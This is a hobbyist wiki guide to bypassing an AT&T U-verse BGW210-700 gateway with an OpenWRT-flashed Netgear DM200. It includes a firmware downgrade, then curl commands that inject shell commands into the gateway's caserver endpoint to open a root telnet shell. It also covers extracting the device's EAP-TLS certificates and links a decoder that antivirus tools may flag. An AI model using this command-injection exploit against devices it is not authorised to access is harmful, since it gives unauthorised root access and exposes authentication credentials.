AndrewWiki

• Netgear DM200 VDSL modem
• AT&T Uverse Router / Gateway BGW210-700

• curl (already installed on recent Windows 10 builds)
• 7zip - https://www.7-zip.org/
• FileZilla - https://filezilla-project.org/
• PuTTY - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
• mfg_dat_decode - https://mega.nz/#!n75hDYzQ!HpVMP1h8o3Nol0IKGLKdVA8bh5p1Kq_JFn08FSK_dPo
  • Your computer may detect malware and prevent you from downloading this file. If it makes you uncomfortable, you can run it in a VM and destroy the VM when you're done.
• AT&T UVerse RG firmware archive - https://mega.nz/file/35lBkbzC#MTrKdt57SEuz81Tn3MBKm-o_s1zv643MLmxyKILjsk8

The Netgear DM200 VDSL modem needs to be flashed to use OpenWRT, and some prep work needs to be started before we can take down the AT&T UVerse modem. The reason why we have to use OpenWRT for the DM200 modem is because AT&T uses EAPOL for authentication vs every other DSL provider that uses PPPoE. The stock firmware on the Netgear DM200 does have PPPoE support, but no EAPOL. Additionally, I have tried putting the modem into bridge mode and running wpa_supplicant on my router, but no EAP packets are forwarded to AT&T's authenticator through the Netgear DM200 modem's bridge. From my tinkering, the Netgear DM200 uses a standard brctl Linux bridge. However, the standard brctl Linux bridge does not forward EAPOL packets due to it's design. It's possible to force the bridge to forward EAPOL packets but in testing this did not work, either with the stock DM200 firmware or OpenWRT firmware.

In this configuration, we are going to be running wpa_supplicant on the DM200 itself, and bridge the DSL connection to the Ethernet connection. This allows a pure layer 2 bridge between the AT&T DSL network, no MTU shifting, and the DM200 does not use any resources managing or tracking connections besides the layer 2 bridge and running wpa_supplicant.

1. Head over to https://openwrt.org/toh/netgear/dm200 and flash the OpenWRT firmware to the DM200
2. After the DM200 comes up, log into the DM200 and reconfigure the eth0 interface to be a DHCP client.
3. Set the DM200 to apply changes without verification, and then plug the modem into your home network with internet access.
4. Log into the DM200 again and go into the system settings to synchronize the time to your browser and set your time zone. This is important because the authentication certificates are time dependent.
5. Change the root password, so the SSH server is activated and you can log into it with SSH
6. Go to the package manager in the DM200 and install the following packages:
   1. wpa-supplicant
   2. ca-certificates
   3. openssh-sftp-server

1. Unzip AT&T RG Uverse firmware package - we're looking for spTurquoise210-700_1.0.29.bin
2. Disconnect the DSL cable from the UVerse RG.
3. Log into your UVerse RG and downgrade the firmware with the above firmware file. The process takes several minutes and modem will reboot.
4. After the modem is running again, go to http://192.168.1.254/cgi-bin/ipalloc.ha and assign yourself a static IP address
5. Refresh your computer's IP address to make sure you have the private IP address that was assigned.
6. Log into the UVerse RG again and authenticate
7. Run the following curl commands to start a telnet server on the UVerse modem. When prompted for the password for the user tech, just hit ENTER. After the last command is executed, the UVerse RG will reboot.
   • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| echo 28telnet stream tcp nowait root /usr/sbin/telnetd -i -l /bin/nsh > /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
   • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -a /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
   • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -s|" -v --http1.1 https://192.168.1.254:49955/caserver
   • curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| reboot|" -v --http1.1 https://192.168.1.254:49955/caserver
8. Log into the UVerse RG with PuTTY using the IP address 192.168.1.254 on port 28 using the Telnet selection
9. Remount root file system as writeable
   • mount -o remount,rw /dev/ubi0 /
10. Mount the mfg partition which contains the certificates
    • mount mtd:mfg -t jffs2 /mfg
11. Copy the certificate bundle to the web server directory
    • cp /mfg/mfg.dat /www/att/mfg.dat
12. Tar and copy the intermediate and root certificates to the web server directory
    • tar -zcvf /www/att/certs.tar.gz /etc/rootcert/
13. Download the certificate bundle and the intermediate and root certificates:
    • http://192.168.1.254/mfg.dat
    • http://192.168.1.254/certs.tar.gz
14. Throw the UVerse RG into the garbage
    • Don't actually throw it in the garbage, you need to return it when you terminate your service with AT&T otherwise they will bill you a hefty sum.
    • Using the firmware archive that was downloaded earlier, you can step the UVerse back up to the current firmware by flashing 1.0.29, then 1.5.12, then 2.7.1
15. Extract the mfg_dat_decode utility that was downloaded earlier
16. Extract the certs.tar.gz archive that was downloaded earlier
17. Copy the mfg.dat file into the folder with the mfg_dat_decode binary
18. Copy all of the certificates extracted from certs.tar.gz into the folder with the mfg_dat_decode binary
19. Run the mfg_dat_decode binary, which will extract and create a tar.gz containing certificates and a wpa_supplicant.conf configuration file.
20. Extract the tar.gz file - you'll end up with a directory that contains three pem formatted certificates, a sample wpa_supplicant.conf file, and a readme.txt file.

1. Create a new text file, and paste the following into it and save it as 99_dsl_eap.sh

#!/bin/sh

logger -t DSL "$DSL_NOTIFICATION_TYPE $DSL_INTERFACE_STATUS"

if [ "$DSL_NOTIFICATION_TYPE" = "DSL_INTERFACE_STATUS" ] && [ "$DSL_INTERFACE_STATUS" = "UP" ]; then
        logger -t DSL "DSL interface UP, starting wpa_supplicant..."
        /usr/sbin/wpa_supplicant -s -B -P /var/run/wpa_supplicant.pid -D wired -i dsl0 -b br-br0 -c /etc/wpa_supplicant/wpa_supplicant.conf
        ip link set eth0 down
        sleep 5
        ip link set eth0 up
fi

if [ "$DSL_NOTIFICATION_TYPE" = "DSL_INTERFACE_STATUS" ] && [ "$DSL_INTERFACE_STATUS" = "DOWN" ]; then
        logger -t DSL "DSL interface DOWN, killing wpa_supplicant..."
        if [ -e /var/run/wpa_supplicant.pid ]; then
                kill $(cat /tmp/run/wpa_supplicant.pid)
        fi
        ip link set eth0 down
fi

1. Connect to the DM200 using FileZilla in sftp mode with the root username and password
2. Create the new directory /etc/wpa_supplicant
3. Copy the three pem formatted certificates and the wpa_supplicant.conf file into the /etc/wpa_supplicant directory
4. Copy

• https://pastebin.com/SUGLTfv4
• https://openwrt.org/toh/netgear/dm200
• https://en.wikipedia.org/wiki/IEEE_802.1X
• https://www.dupuis.xyz/bgw210-700-root-and-certs/
• http://earlz.net/view/2012/06/07/0026/rooting-the-nvg510-from-the-webui
• https://www.reddit.com/r/ATT/comments/g59rwm/bgw210700_root_exploitbypass/
• https://www.devicelocksmith.com/2018/12/eap-tls-credentials-decoder-for-nvg-and.html